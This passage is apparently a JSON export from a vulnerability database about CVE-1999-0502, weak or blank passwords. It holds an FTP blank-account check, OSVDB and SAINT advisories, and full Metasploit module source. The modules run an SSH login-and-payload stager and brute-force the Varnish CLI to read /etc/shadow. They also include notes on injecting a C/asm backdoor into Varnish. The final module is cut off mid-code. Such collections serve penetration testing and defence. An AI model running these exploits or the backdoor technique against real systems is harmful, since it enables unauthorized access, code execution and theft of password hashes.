banner)\n{\n # do nothing\n} else {\n exit(0);\n}\n\nsoc = open_sock_tcp(port);\nif(!soc)exit(0);\nd = ftp_recv_line(socket:soc);\n\nCRLF = raw_string(0x0d, 0x0a);\ncracked = string(\"\");\n\nfor(i=0; accounts[i]; i = i +1)\n{\n username = accounts[i];\n user = string(\"USER \", username, CRLF); \n \n send(socket:soc, data:user);\n resp = ftp_recv_line(socket:soc);\n \n if (\"230 User logged on\" >< resp)\n {\n cracked = string(cracked, username, \"\\n\");\n }\n}\nftp_close(soc);\n\nif (strlen(cracked))\n{\n report = string(\"These accounts have no passwords:\\n\\n\", cracked);\n security_message(port:port, data:report);\n}\n\n\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "references": [], "edition": 1, "description": "## Vulnerability Description\nBy default, Netscape Enterprise Server administrative interface installs with a default password. The admin account has a password of admin which is publicly known and documented. This allows attackers to trivially access the program or system.\n## Technical Description\nDefault:\nUsername:admin\nPassword:admin\n\nThe Administrative interface operates on port 8888/TCP\n## Solution Description\nImmediately after installation, change all default install passwords to a unique and secure password. When possible, change default accounts to custom names as well.\n## Short Description\nBy default, Netscape Enterprise Server administrative interface installs with a default password. The admin account has a password of admin which is publicly known and documented. This allows attackers to trivially access the program or system.\n## References:\n[Nessus Plugin ID:11208](https://vulners.com/search?query=pluginID:11208)\nGeneric Informational URL: http://www.cirt.net/cgi-bin/passwd.pl?method=showven&ven=Netscape\n[CVE-1999-0502](https://vulners.com/cve/CVE-1999-0502)\n", "reporter": "OSVDB", "published": "2003-02-18T00:00:00", "title": "Netscape Enterprise Default Administrative Password", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Enterprise Server", "version": "Unknown or Unspecified", "operator": "eq"}], "cvelist": ["CVE-1999-0502"], "modified": "2003-02-18T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:876", "id": "OSVDB:876", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:19:55", "references": [], "edition": 1, "description": "## Vulnerability Description\nThis host has one or more accounts with a blank password. Please see the data section for a list of these accounts.\n## Short Description\nThis host has one or more accounts with a blank password. Please see the data section for a list of these accounts.\n## References:\n[Nessus Plugin ID:11000](https://vulners.com/search?query=pluginID:11000)\n[CVE-1999-0502](https://vulners.com/cve/CVE-1999-0502)\n", "reporter": "OSVDB", "published": "2001-01-01T00:00:00", "title": "MPE/iX Default Accounts", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "affectedSoftware": [], "bulletinFamily": "software", "cvelist": ["CVE-1999-0502"], "modified": "2001-01-01T00:00:00", "id": "OSVDB:822", "href": "https://vulners.com/osvdb/OSVDB:822", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:19:57", "references": [], "edition": 1, "description": "## Vulnerability Description\nPasswords are a cornerstone of computer security. Virtually every sensitive computer resource requires one or more passwords to access it in any context. Most virtual authentication methods are based on some form of password, or security token. Given that passwords are chosen by the user, who tends to pick words easily remembered, along with poor password implementation, weak passwords are a common method for network intrusion. Despite decades of reliance upon these passwords, systems still ship with no password, easily guessed passwords, or no mechanisms to force users to maintain strong passwords. This often leads to passwords that are weak and easy to compromise.\n\n## Solution Description\nWhile it is an accepted fact of security that any password can be guessed given sufficient resources, every organization should attempt to maintain strong passwords to deter and delay such compromises. The following measures can be taken to help in this process:\n\n1. Passwords should be sufficiently complex:\na. Be at least eight characters in length\nb. Contain upper case, lower case, and special characters\nc. Not be a word in any language or found in any dictionary\nd. Not bear any resemblence to the user, family, pets, etc.\n2. Enforce password history. Ensure users must pick a new unique password and can not re-use old passwords.\n3. Maximum password age. After a set amount of time (recommended 30 - 90 days), the password should expire and force users to select a new one.\n4. Test password security by attempting to \"crack\" passwords. Only do so with written permission from a CEO/CSO/CxO.\n5. Ensure users are educated on password security and the importance of passwords. This includes training on what not to do regarding passwords (ie: share them, write them down).\n## Short Description\nPasswords are a cornerstone of computer security. Virtually every sensitive computer resource requires one or more passwords to access it in any context. Most virtual authentication methods are based on some form of password, or security token. Given that passwords are chosen by the user, who tends to pick words easily remembered, along with poor password implementation, weak passwords are a common method for network intrusion. Despite decades of reliance upon these passwords, systems still ship with no password, easily guessed passwords, or no mechanisms to force users to maintain strong passwords. This often leads to passwords that are weak and easy to compromise.\n\n## References:\nOther Solution URL: http://www.openwall.com/john/\nKeyword: SANS Top 20 2002 Unix Issue #10\nKeyword: SANS Top 20 2001 General Issue #02\nKeyword: SANS Top 20 2003 Unix Issue #04\nKeyword: SANS Top 20 2000 General Issue #08\nGeneric Informational URL: http://www.sans.org/top20/oct02.php#U10\nGeneric Informational URL: http://www.sans.org/top20/top20_oct01.php\nGeneric Informational URL: http://www.sans.org/top20/top10.php\nGeneric Informational URL: http://www.sans.org/top20/#u4\n[CVE-1999-0502](https://vulners.com/cve/CVE-1999-0502)\n[CVE-1999-0501](https://vulners.com/cve/CVE-1999-0501)\n", "reporter": "OSVDB", "published": "1980-01-01T00:00:00", "title": "Unix Password Authentication Security Point of Failure", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Unix", "version": "All Versions", "operator": "eq"}], "cvelist": ["CVE-1999-0502", "CVE-1999-0501"], "modified": "1980-01-01T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:3118", "id": "OSVDB:3118", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-01-02T03:17:37", "references": [], "description": "Exploit for multiple platform in category remote exploits", "edition": 1, "reporter": "metasploit", "published": "2017-03-23T00:00:00", "type": "zdt", "title": "SSH - User Code Execution Exploit", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "modified": "2017-03-23T00:00:00", "href": "https://0day.today/exploit/description/27399", "id": "1337DAY-ID-27399", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\nrequire 'net/ssh'\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n \r\n include Msf::Exploit::CmdStager\r\n include Msf::Exploit::Remote::SSH\r\n \r\n attr_accessor :ssh_socket\r\n \r\n def initialize\r\n super(\r\n 'Name' => 'SSH User Code Execution',\r\n 'Description' => %q{\r\n This module connects to the target system and executes the necessary\r\n commands to run the specified payload via SSH. If a native payload is\r\n specified, an appropriate stager will be used.\r\n },\r\n 'Author' => ['Spencer McIntyre', 'Brandon Knight'],\r\n 'References' =>\r\n [\r\n [ 'CVE', '1999-0502'] # Weak password\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Privileged' => true,\r\n 'DefaultOptions' =>\r\n {\r\n 'PrependFork' => 'true',\r\n 'EXITFUNC' => 'process'\r\n },\r\n 'Payload' =>\r\n {\r\n 'Space' => 4096,\r\n 'BadChars' => \"\",\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => %w{ linux osx python },\r\n 'Targets' =>\r\n [\r\n [ 'Linux x86',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux'\r\n }\r\n ],\r\n [ 'Linux x64',\r\n {\r\n 'Arch' => ARCH_X64,\r\n 'Platform' => 'linux'\r\n }\r\n ],\r\n [ 'OSX x86',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'osx'\r\n }\r\n ],\r\n [ 'Python',\r\n {\r\n 'Arch' => ARCH_PYTHON,\r\n 'Platform' => 'python'\r\n }\r\n ]\r\n ],\r\n 'CmdStagerFlavor' => %w{ bourne echo printf },\r\n 'DefaultTarget' => 0,\r\n # For the CVE\r\n 'DisclosureDate' => 'Jan 01 1999'\r\n )\r\n \r\n register_options(\r\n [\r\n OptString.new('USERNAME', [ true, \"The user to authenticate as.\", 'root' ]),\r\n OptString.new('PASSWORD', [ true, \"The password to authenticate with.\", '' ]),\r\n OptString.new('RHOST', [ true, \"The target address\" ]),\r\n Opt::RPORT(22)\r\n ], self.class\r\n )\r\n \r\n register_advanced_options(\r\n [\r\n OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false])\r\n ]\r\n )\r\n end\r\n \r\n def execute_command(cmd, opts = {})\r\n vprint_status(\"Executing #{cmd}\")\r\n begin\r\n Timeout.timeout(3) do\r\n self.ssh_socket.exec!(\"#{cmd}\\n\")\r\n end\r\n rescue ::Exception\r\n end\r\n end\r\n \r\n def do_login(ip, user, pass, port)\r\n factory = ssh_socket_factory\r\n opt_hash = {\r\n :auth_methods => ['password', 'keyboard-interactive'],\r\n :port => port,\r\n :use_agent => false,\r\n :config => false,\r\n :password => pass,\r\n :proxy => factory,\r\n :non_interactive => true\r\n }\r\n \r\n opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']\r\n \r\n begin\r\n self.ssh_socket = Net::SSH.start(ip, user, opt_hash)\r\n rescue Rex::ConnectionError\r\n fail_with(Failure::Unreachable, 'Disconnected during negotiation')\r\n rescue Net::SSH::Disconnect, ::EOFError\r\n fail_with(Failure::Disconnected, 'Timed out during negotiation')\r\n rescue Net::SSH::AuthenticationFailed\r\n fail_with(Failure::NoAccess, 'Failed authentication')\r\n rescue Net::SSH::Exception => e\r\n fail_with(Failure::Unknown, \"SSH Error: #{e.class} : #{e.message}\")\r\n end\r\n \r\n if not self.ssh_socket\r\n fail_with(Failure::Unknown, 'Failed to start SSH socket')\r\n end\r\n return\r\n end\r\n \r\n def exploit\r\n do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])\r\n \r\n print_status(\"#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...\")\r\n if target['Platform'] == 'python'\r\n execute_command(\"python -c \\\"#{payload.encoded}\\\"\")\r\n else\r\n execute_cmdstager({:linemax => 500})\r\n end\r\n \r\n self.ssh_socket.close\r\n end\r\nend\n\n# 0day.today [2018-01-02] #", "sourceHref": "https://0day.today/exploit/27399", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T19:09:15", "references": [], "edition": 2, "description": "This Metasploit module utilizes a stager to upload a base64 encoded binary which is then decoded, chmod'ed and executed from the command shell.", "reporter": "metasploit", "published": "2013-05-16T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "SSH User Code Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "modified": "2013-05-16T00:00:00", "id": "1337DAY-ID-20781", "href": "https://0day.today/exploit/description/20781", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'net/ssh'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::CmdStagerBourne\r\n\r\n attr_accessor :ssh_socket\r\n\r\n def initialize\r\n super(\r\n 'Name' => 'SSH User Code Execution',\r\n 'Description' => %q{\r\n This module utilizes a stager to upload a base64 encoded\r\n binary which is then decoded, chmod'ed and executed from\r\n the command shell.\r\n },\r\n 'Author' => ['Spencer McIntyre', 'Brandon Knight'],\r\n 'References' =>\r\n [\r\n [ 'CVE', '1999-0502'] # Weak password\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Privileged' => true,\r\n 'DefaultOptions' =>\r\n {\r\n 'PrependFork' => 'true',\r\n 'EXITFUNC' => 'process'\r\n },\r\n 'Payload' =>\r\n {\r\n 'Space' => 4096,\r\n 'BadChars' => \"\",\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => [ 'osx', 'linux' ],\r\n 'Targets' =>\r\n [\r\n [ 'Linux x86',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux'\r\n },\r\n ],\r\n [ 'Linux x64',\r\n {\r\n 'Arch' => ARCH_X86_64,\r\n 'Platform' => 'linux'\r\n },\r\n ],\r\n [ 'OSX x86',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'osx'\r\n },\r\n ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n # For the CVE\r\n 'DisclosureDate' => 'Jan 01 1999'\r\n )\r\n\r\n register_options(\r\n [\r\n OptString.new('USERNAME', [ true, \"The user to authenticate as.\", 'root' ]),\r\n OptString.new('PASSWORD', [ true, \"The password to authenticate with.\", '' ]),\r\n OptString.new('RHOST', [ true, \"The target address\" ]),\r\n Opt::RPORT(22)\r\n ], self.class\r\n )\r\n\r\n register_advanced_options(\r\n [\r\n OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false])\r\n ]\r\n )\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n begin\r\n Timeout.timeout(3) do\r\n self.ssh_socket.exec!(\"#{cmd}\\n\")\r\n end\r\n rescue ::Exception\r\n end\r\n end\r\n\r\n def do_login(ip, user, pass, port)\r\n opt_hash = {\r\n :auth_methods => ['password', 'keyboard-interactive'],\r\n :msframework => framework,\r\n :msfmodule => self,\r\n :port => port,\r\n :disable_agent => true,\r\n :password => pass\r\n }\r\n\r\n opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']\r\n\r\n begin\r\n self.ssh_socket = Net::SSH.start(ip, user, opt_hash)\r\n rescue Rex::ConnectionError, Rex::AddressInUse\r\n fail_with(Exploit::Failure::Unreachable, 'Disconnected during negotiation')\r\n rescue Net::SSH::Disconnect, ::EOFError\r\n fail_with(Exploit::Failure::Disconnected, 'Timed out during negotiation')\r\n rescue Net::SSH::AuthenticationFailed\r\n fail_with(Exploit::Failure::NoAccess, 'Failed authentication')\r\n rescue Net::SSH::Exception => e\r\n fail_with(Exploit::Failure::Unknown, \"SSH Error: #{e.class} : #{e.message}\")\r\n end\r\n\r\n if not self.ssh_socket\r\n fail_with(Exploit::Failure::Unknown)\r\n end\r\n return\r\n end\r\n\r\n def exploit\r\n do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])\r\n\r\n print_status(\"#{datastore['RHOST']}:#{datastore['RPORT']} - Sending Bourne stager...\")\r\n execute_cmdstager({:linemax => 500})\r\n end\r\nend\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/20781"}, {"lastseen": "2018-02-17T23:28:09", "references": [], "description": "This Metasploit module attempts to login to the Varnish Cache (varnishd) CLI instance using a bruteforce list of passwords. This Metasploit module will also attempt to read the /etc/shadow root password hash if a valid password is found. It is possible to execute code as root with a valid password, however this is not yet implemented in this module.", "edition": 2, "reporter": "metasploit", "published": "2014-12-21T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "zdt", "title": "Varnish Cache CLI Interface Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502", "CVE-2009-2936"], "modified": "2014-12-21T00:00:00", "id": "1337DAY-ID-23029", "href": "https://0day.today/exploit/description/23029", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Auxiliary\r\n \r\n include Msf::Exploit::Remote::Tcp\r\n include Msf::Auxiliary::Report\r\n include Msf::Auxiliary::AuthBrute\r\n include Msf::Auxiliary::Scanner\r\n \r\n def initialize\r\n super(\r\n 'Name' => 'Varnish Cache CLI Interface Bruteforce Utility',\r\n 'Description' => 'This module attempts to login to the Varnish Cache (varnishd) CLI instance using a bruteforce\r\n list of passwords. This module will also attempt to read the /etc/shadow root password hash\r\n if a valid password is found. It is possible to execute code as root with a valid password,\r\n however this is not yet implemented in this module.',\r\n 'References' =>\r\n [\r\n [ 'OSVDB', '67670' ],\r\n [ 'CVE', '2009-2936' ],\r\n # General\r\n [ 'URL', 'https://www.varnish-cache.org/trac/wiki/CLI' ],\r\n [ 'CVE', '1999-0502'] # Weak password\r\n ],\r\n 'Author' => [ 'patrick' ],\r\n 'License' => MSF_LICENSE\r\n )\r\n \r\n register_options(\r\n [\r\n Opt::RPORT(6082),\r\n OptPath.new('PASS_FILE', [ false, \"File containing passwords, one per line\",\r\n File.join(Msf::Config.data_directory, \"wordlists\", \"unix_passwords.txt\") ]),\r\n ], self.class)\r\n \r\n deregister_options('USERNAME', 'USER_FILE', 'USERPASS_FILE', 'USER_AS_PASS', 'DB_ALL_CREDS', 'DB_ALL_USERS')\r\n end\r\n \r\n def run_host(ip)\r\n connect\r\n res = sock.get_once(-1,3) # detect banner\r\n if (res =~ /107 \\d+\\s\\s\\s\\s\\s\\s\\n(\\w+)\\n\\nAuthentication required./) # 107 auth\r\n vprint_status(\"Varnishd CLI detected - authentication required.\")\r\n each_user_pass { |user, pass|\r\n sock.put(\"auth #{Rex::Text.rand_text_alphanumeric(3)}\\n\") # Cause a login fail.\r\n res = sock.get_once(-1,3) # grab challenge\r\n if (res =~ /107 \\d+\\s\\s\\s\\s\\s\\s\\n(\\w+)\\n\\nAuthentication required./) # 107 auth\r\n challenge = $1\r\n secret = pass + \"\\n\" # newline is needed\r\n response = challenge + \"\\n\" + secret + challenge + \"\\n\"\r\n response = Digest::SHA256.hexdigest(response)\r\n sock.put(\"auth #{response}\\n\")\r\n res = sock.get_once(-1,3)\r\n if (res =~ /107 \\d+/) # 107 auth\r\n vprint_status(\"FAILED: #{secret}\")\r\n elsif (res =~ /200 \\d+/) # 200 ok\r\n print_good(\"GOOD: #{secret}\") \r\n \r\n report_auth_info(\r\n :host => rhost,\r\n :port => rport,\r\n :sname => ('varnishd'),\r\n :pass => pass,\r\n :proof => \"#{res}\",\r\n :source_type => \"user_supplied\",\r\n :active => true\r\n )\r\n \r\n sock.put(\"vcl.load #{Rex::Text.rand_text_alphanumeric(3)} /etc/shadow\\n\") # only returns 1 line of any target file.\r\n res = sock.get_once(-1,3)\r\n if (res =~ /root:([\\D\\S]+):/) # lazy.\r\n if ($1[0] == \"!\")\r\n vprint_error(\"/etc/shadow root uid is disabled.\\n\")\r\n else\r\n print_good(\"/etc/shadow root enabled:\\nroot:#{$1}:\")\r\n end\r\n else\r\n vprint_error(\"Unable to read /etc/shadow?:\\n#{res}\\n\")\r\n end\r\n \r\n break\r\n else\r\n vprint_error(\"Unknown response:\\n#{res}\\n\")\r\n end\r\n end\r\n }\r\n elsif (res =~ /Varnish Cache CLI 1.0/)\r\n print_good(\"Varnishd CLI does not require authentication!\")\r\n else\r\n vprint_error(\"Unknown response:\\n#{res}\\n\")\r\n end\r\n disconnect\r\n end\r\nend\r\n \r\n=begin\r\n \r\naushack notes:\r\n \r\n- varnishd typically runs as root, forked as unpriv.\r\n- 'param.show' lists configurable options.\r\n- 'cli_timeout' is 60 seconds. param.set cli_timeout 99999 (?) if we want to inject payload into a client thread and avoid being killed.\r\n- 'user' is nobody. param.set user root (may have to stop/start the child to activate)\r\n- 'group' is nogroup. param.set group root (may have to stop/start the child to activate)\r\n- (unless varnishd is launched with -r user,group (read-only) implemented in v4, which may make priv esc fail).\r\n- vcc_unsafe_path is on. used to 'import ../../../../file' etc.\r\n- vcc_allow_inline_c is off. param.set vcc_allow_inline_c on to enable code execution.\r\n- code execution notes:\r\n \r\n* quotes must be escaped \\\"\r\n* \\n is a newline\r\n* C{ }C denotes raw C code.\r\n* e.g. C{ unsigned char shellcode[] = \\\"\\xcc\\\"; }C\r\n* #import <stdio.h> etc must be \"newline\", i.e. C{ \\n#include <stdlib.h>\\n dosomething(); }C (without 2x \\n, include statement will not interpret correctly).\r\n* C{ asm(\\\"int3\\\"); }C can be used for inline assembly / shellcode.\r\n* varnishd has it's own 'vcl' syntax. can't seem to inject C randomly - must fit VCL logic.\r\n* example trigger for backdoor:\r\n \r\nVCL server:\r\n vcl.inline foo \"vcl 4.0;\\nbackend b { . host = \\\"127.0.0.1\\\"; } sub vcl_recv { if (req.url ~ \\\"^/backd00r\\\") { C{ asm(\\\"int3\\\"); }C } } \\n\"\r\n vcl.use foo\r\n start\r\n \r\nAttacker:\r\n telnet target 80\r\n GET /backd00r HTTP/1.1\r\n Host: 127.0.0.1\r\n \r\n(... wait for child to execute debug trap INT3 / shellcode).\r\n \r\nCLI protocol notes from website:\r\n \r\nThe CLI protocol used on the management/telnet interface is a strict request/response protocol, there are no unsolicited transmissions from the responding end.\r\n \r\nRequests are whitespace separated tokens terminated by a newline (NL) character.\r\n \r\nTokens can be quoted with \"...\" and common backslash escape forms are accepted: (\\n), (\\r), (\\t), (\r\n), (\\\"), (\\%03o) and (\\x%02x)\r\n \r\nThe response consists of a header which can be read as fixed format or ASCII text:\r\n \r\n 1-3 %03d Response code\r\n 4 ' ' Space\r\n 5-12 %8d Length of body\r\n 13 \\n NL character.\r\nFollowed by the number of bytes announced by the header.\r\n \r\nThe Responsecode is numeric shorthand for the nature of the reaction, with the following values currently defined in include/cli.h:\r\n \r\nenum cli_status_e {\r\n CLIS_SYNTAX = 100,\r\n CLIS_UNKNOWN = 101,\r\n CLIS_UNIMPL = 102,\r\n CLIS_TOOFEW = 104,\r\n CLIS_TOOMANY = 105,\r\n CLIS_PARAM = 106,\r\n CLIS_OK = 200,\r\n CLIS_CANT = 300,\r\n CLIS_COMMS = 400,\r\n CLIS_CLOSE = 500\r\n};\r\n=end\n\n# 0day.today [2018-02-17] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/23029"}], "saint": [{"lastseen": "2016-10-03T15:01:54", "references": [], "description": "Added: 01/05/2011 \nCVE: [CVE-1999-0502](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0502>) \n\n\n### Background\n\nPasswords are the most commonly used method of authenticating users to a server. The combination of a login name and password is used to verify the identity of a user requesting access, and to determine what parts of the server the user has permission to access. \n\n### Problem\n\nAdministrators often set up new user accounts with no password or with a default password which is easy to guess. Additionally, some users may choose a simple password which is easy to remember. Null passwords and passwords that are very similar to the login name are an easy way for attackers to gain access to the system. \n\n### Resolution\n\nProtect all accounts with a password that cannot be guessed. Require users to choose passwords which are eight charactes long, including numeric and non-alphanumeric characters, and which are not based on the login name or any other personal information about the user. \n\n### References\n\n<http://www.securityfocus.com/infocus/1537> \n\n\n### Limitations\n\nThe target must be running the ssh service in order for the exploit to succeed. \n\nThe OpenSSH client must be installed on the SAINTexploit host. \n\n### Platforms\n\nLinux \nUnix \nCisco \n \n\n", "edition": 1, "reporter": "SAINT Corporation", "published": "2011-01-05T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "saint", "title": "SSH password weakness", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "modified": "2011-01-05T00:00:00", "id": "SAINT:BF189A05AE2FE4C91F81F7C6BF891621", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ssh_login", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-14T16:58:04", "references": [], "edition": 1, "description": "Added: 01/05/2011 \nCVE: [CVE-1999-0502](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0502>) \n\n\n### Background\n\nPasswords are the most commonly used method of authenticating users to a server. The combination of a login name and password is used to verify the identity of a user requesting access, and to determine what parts of the server the user has permission to access. \n\n### Problem\n\nAdministrators often set up new user accounts with no password or with a default password which is easy to guess. Additionally, some users may choose a simple password which is easy to remember. Null passwords and passwords that are very similar to the login name are an easy way for attackers to gain access to the system. \n\n### Resolution\n\nProtect all accounts with a password that cannot be guessed. Require users to choose passwords which are eight charactes long, including numeric and non-alphanumeric characters, and which are not based on the login name or any other personal information about the user. \n\n### References\n\n<http://www.securityfocus.com/infocus/1537> \n\n\n### Limitations\n\nThe target must be running the ssh service in order for the exploit to succeed. \n\nThe OpenSSH client must be installed on the SAINTexploit host. \n\n### Platforms\n\nLinux \nUnix \nCisco \n \n\n", "reporter": "SAINT Corporation", "published": "2011-01-05T00:00:00", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "SSH password weakness", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "modified": "2011-01-05T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ssh_login", "id": "SAINT:D03628286E2696A69838C01360532538", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:08:13", "references": [], "description": "Added: 01/05/2011 \nCVE: [CVE-1999-0502](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0502>) \n\n\n### Background\n\nPasswords are the most commonly used method of authenticating users to a server. The combination of a login name and password is used to verify the identity of a user requesting access, and to determine what parts of the server the user has permission to access. \n\n### Problem\n\nAdministrators often set up new user accounts with no password or with a default password which is easy to guess. Additionally, some users may choose a simple password which is easy to remember. Null passwords and passwords that are very similar to the login name are an easy way for attackers to gain access to the system. \n\n### Resolution\n\nProtect all accounts with a password that cannot be guessed. Require users to choose passwords which are eight charactes long, including numeric and non-alphanumeric characters, and which are not based on the login name or any other personal information about the user. \n\n### References\n\n<http://www.securityfocus.com/infocus/1537> \n\n\n### Limitations\n\nThe target must be running the ssh service in order for the exploit to succeed. \n\nThe OpenSSH client must be installed on the SAINTexploit host. \n\n### Platforms\n\nLinux \nUnix \nCisco \n \n\n", "edition": 3, "reporter": "SAINT Corporation", "published": "2011-01-05T00:00:00", "title": "SSH password weakness", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "modified": "2011-01-05T00:00:00", "id": "SAINT:713447983665FEF2B21EA1044C36B51E", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ssh_login", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:26", "references": [], "edition": 1, "description": "", "reporter": "Spencer McIntyre", "published": "2013-05-15T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "packetstorm", "title": "SSH User Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "modified": "2013-05-15T00:00:00", "href": "https://packetstormsecurity.com/files/121655/SSH-User-Code-Execution.html", "id": "PACKETSTORM:121655", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \nrequire 'net/ssh' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Exploit::CmdStagerBourne \n \nattr_accessor :ssh_socket \n \ndef initialize \nsuper( \n'Name' => 'SSH User Code Execution', \n'Description' => %q{ \nThis module utilizes a stager to upload a base64 encoded \nbinary which is then decoded, chmod'ed and executed from \nthe command shell. \n}, \n'Author' => ['Spencer McIntyre', 'Brandon Knight'], \n'References' => \n[ \n[ 'CVE', '1999-0502'] # Weak password \n], \n'License' => MSF_LICENSE, \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'PrependFork' => 'true', \n'EXITFUNC' => 'process' \n}, \n'Payload' => \n{ \n'Space' => 4096, \n'BadChars' => \"\", \n'DisableNops' => true \n}, \n'Platform' => [ 'osx', 'linux' ], \n'Targets' => \n[ \n[ 'Linux x86', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n}, \n], \n[ 'Linux x64', \n{ \n'Arch' => ARCH_X86_64, \n'Platform' => 'linux' \n}, \n], \n[ 'OSX x86', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'osx' \n}, \n], \n], \n'DefaultTarget' => 0, \n# For the CVE \n'DisclosureDate' => 'Jan 01 1999' \n) \n \nregister_options( \n[ \nOptString.new('USERNAME', [ true, \"The user to authenticate as.\", 'root' ]), \nOptString.new('PASSWORD', [ true, \"The password to authenticate with.\", '' ]), \nOptString.new('RHOST', [ true, \"The target address\" ]), \nOpt::RPORT(22) \n], self.class \n) \n \nregister_advanced_options( \n[ \nOptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]) \n] \n) \nend \n \ndef execute_command(cmd, opts = {}) \nbegin \nTimeout.timeout(3) do \nself.ssh_socket.exec!(\"#{cmd}\\n\") \nend \nrescue ::Exception \nend \nend \n \ndef do_login(ip, user, pass, port) \nopt_hash = { \n:auth_methods => ['password', 'keyboard-interactive'], \n:msframework => framework, \n:msfmodule => self, \n:port => port, \n:disable_agent => true, \n:password => pass \n} \n 